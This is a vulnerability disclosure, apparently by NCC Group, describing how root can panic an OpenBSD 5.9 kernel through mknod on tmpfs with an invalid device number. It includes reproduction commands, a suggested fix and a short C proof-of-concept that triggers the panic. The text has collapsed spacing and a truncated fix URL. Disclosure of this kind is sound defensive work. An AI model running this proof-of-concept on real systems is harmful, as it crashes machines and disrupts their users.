|  
 #ifdef BUG_WRITEUP //--------------------------------------------------- 
 Root can panic kernel with mknod on a tmpfs filesystem 
  
 Impact: 
 Root can panic the kernel. 
  
 Description: 
 When performing a mknod system call on a tmpfs filesystem, 
 the tmpfs_alloc_node() function asserts that the rdev parameter 
 isnot VNOVAL (-1): 
  
 switch(nnode->tn_type) { 
 caseVBLK: 
 caseVCHR: 
 KASSERT(rdev != VNOVAL); 
 nnode->tn_spec.tn_dev.tn_rdev = rdev; 
 break; 
  
 However, the value or rdev isnever validated previous to this. 
 Users that can perform mknod() calls on a tmpfs (i.e. root) 
 can trigger thiscondition to panic the kernel. 
  
 Reproduction: 
 Compile the attached test program and execute it asroot with a path 
 to a non-existance filename on a tmpfs filesystem: 
  
 # mount -o rw,-s16M -t tmpfs swap /mnt 
 # gcc -g tmpfs_mknod_panic.c -o tmpfs_mknod_panic 
 # ./tmpfs_mknod_panic /mnt/boom 
  
 This should cause the kernel to panic intmpfs_alloc_node(). 
 NCC Group was able to reproduce thisissue on OpenBSD 5.9 release 
 running amd64. 
  
 Recommendation: 
 Validate the device number vap->va_rdev intmpfs_mknod() and return
 an error ifit isVNOVAL (-1). 
  
 Reported: 2016-07-05 
 Fixed: http:
 #endif // BUG_WRITEUP --------------------------------------------------- 
  
 #include <stdio.h> 
 #include <sys/stat.h> 
  
 int
 main(intargc, char**argv) 
 { 
 char*fn; 
 inti, x; 
  
 for(i = 1; i < argc; i++) { 
 fn = argv[i]; 
 x = mknod(fn, S_IFBLK | 0666, -1); 
 if(x == -1) 
 perror(fn); 
 } 
 printf("nothing happened!\n"); 
 return0; 
 } 
 
 |